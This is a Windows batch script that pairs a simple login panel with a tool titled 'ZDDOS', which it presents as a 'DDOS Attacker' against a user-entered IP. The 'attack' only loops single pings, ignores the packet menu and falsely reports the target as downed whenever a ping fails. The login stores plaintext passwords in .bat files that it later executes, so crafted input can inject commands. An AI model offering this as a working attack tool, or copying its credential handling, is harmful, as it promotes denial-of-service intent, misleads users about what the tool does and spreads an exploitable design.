@echo off
mode con cols=65 lines=32
setlocal enabledelayedexpansion
color 0a
title ::Login Panel::

:start1
cls
echo Welcome, Please Sign in
echo =======================
echo [1] Login
echo [2] Sign Up
echo =======================
set /p loginx1=">> "
if not %loginx1% leq 2 goto start1
if %loginx1% equ 1 goto login
echo Please, Enter the New Account Name?
set /p username1=">>> "
set v1f=0

:findspaces
set x=!v1f!
set Letter%v1f%=!username1:~%x%,1!
if "!Letter%v1f%!" equ " " (
echo.
echo.
echo Sorry, no spaces allowed in your username...
pause >nul
goto start1
)
if NOT "!Letter%v1f%!" equ "" (
set /a v1f=%v1f%+1
goto findspaces
)
echo Please, Enter the New Account Password?
set /p password1=">>> "
goto save

:login
cls
set /p name1=Username:
if not exist "%name1%.bat" (
echo Invalid Username...
pause >nul
goto start1
)
set /p pass1=Password:
call %name1%.bat
if not %password1% equ %pass1% (
echo Invalid Password
pause >nul
goto start1
)
goto menu

:save
(
echo set username1=%username1%
echo set password1=%password1%
)>%username1%.bat
goto start1

:menu
echo Welcome,to ZDDOS %username1%.!
pause >nul
echo Press Any Key to Start ZDDOS

title ::ZDDOS::
cls
echo ======================================
echo ########  ########   #######   ######  
echo ##     ## ##     ## ##     ## ##    ## 
echo ##     ## ##     ## ##     ## ##       
echo ##     ## ##     ## ##     ##  ######  
echo ##     ## ##     ## ##     ##       ## 
echo ##     ## ##     ## ##     ## ##    ## 
echo ########  ########   #######   ######
echo ======================================
echo =     Welcome, to DDOS Attacker      =
echo ======================================
echo :: Please Select Packets to Submit ::
echo [1] 500 Packets
echo [2] 1000 Packets
echo [3] 5000 Packets
echo [4] 10000 Packets
echo [5] 20000 Packets
echo [6] 50000 Packets
echo [7] 100000 Packets
echo ======================================

set /p IP=Enter DDOS Target:
:top
PING -n 1 %IP% | FIND "TTL="
title :: Attacking: %IP% ::
IF ERRORLEVEL 1 (echo Target Server Downed Sucessfully)
set /a num=(%Random%%%9)+1
color %num%
ping -t 1 0 10 127.0.0.1 >nul
goto top
